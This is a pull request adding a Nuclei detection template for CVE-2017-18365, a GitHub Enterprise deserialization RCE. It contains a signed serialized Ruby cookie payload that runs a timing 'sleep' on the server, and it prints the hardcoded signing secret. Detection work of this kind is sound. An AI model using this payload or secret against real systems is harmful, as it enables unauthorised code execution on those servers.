### PR TITLE
Add CVE-2017-18365 GitHub Enterprise RCE detection

### DIFF
--- a/http/cves/2017/CVE-2017-18365.yaml
+++ b/http/cves/2017/CVE-2017-18365.yaml
@@ -25,21 +25,26 @@ info:
     cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
   metadata:
     verified: true
-    max-request: 1
+    max-request: 2
     vendor: github
     product: enterprise_server
     shodan-query: http.title:"github debug"
   tags: cve,cve2017,github,deserialization,rce,kev
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/setup/unlock?redirect_to=/"
+  - raw:
+      - |
+        GET /setup/unlock?redirect_to=/ HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: _gh_manage=BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiAAY7AFRJIgxleHBsb2l0BjsAVG86%0AQEFjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uOjpEZXByZWNhdGVkSW5zdGFu%0AY2VWYXJpYWJsZVByb3h5CDoOQGluc3RhbmNlbzoSRXJ1YmlzOjpFcnVieQY6%0ACUBzcmNJIg9zbGVlcCA1OyAxBjsAVDoMQG1ldGhvZDoLcmVzdWx0OglAdmFy%0ASSIMQHJlc3VsdAY7AFQ%3D%0A--ec22248ec82d5da39deb6bf6ceeaafe62630cfde
 
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        part: body_1
         words:
           - "Setup GitHub Enterprise"
           - "GitHub Enterprise"
@@ -47,7 +52,7 @@ http:
         condition: or
 
       - type: regex
-        part: header
+        part: header_1
         regex:
           - "_gh_manage=([A-Za-z0-9+/=]+)--([a-f0-9]{40})"
 
@@ -55,14 +60,14 @@ http:
         dsl:
           - "hmac('sha1', cookie_data, '641dd6454584ddabfed6342cc66281fb') == cookie_hmac"
 
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - "duration_2>=5"
 
     extractors:
       - type: regex
         name: cookie_data
-        part: header
+        part: header_1
         internal: true
         regex:
           - "_gh_manage=([A-Za-z0-9+/=]+)--[a-f0-9]{40}"
@@ -70,15 +75,8 @@ http:
 
       - type: regex
         name: cookie_hmac
-        part: header
+        part: header_1
         internal: true
         regex:
           - "_gh_manage=[A-Za-z0-9+/=]+--([a-f0-9]{40})"
-        group: 1
-
-      - type: regex
-        name: full_cookie
-        part: header
-        regex:
-          - "_gh_manage=([A-Za-z0-9+/=]+--[a-f0-9]{40})"
         group: 1


### PR DESCRIPTION
/claim #14451

### PR Information

GitHub Enterprise 2.8.x before 2.8.7 uses a hardcoded session secret, allowing unauthenticated RCE via Ruby deserialization.

- Added CVE-2017-18365
- References:
  - https://www.exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html
  - https://nvd.nist.gov/vuln/detail/CVE-2017-18365
  - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/github_enterprise_secret.rb

### Template validation

- [ ] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Detection logic follows the [Metasploit module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/github_enterprise_secret.rb): extracts `_gh_manage` cookie, computes HMAC-SHA1 with known static secret, compares against signature.

GitHub Enterprise is proprietary - tested against mock servers simulating vulnerable/patched cookie signing behavior.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)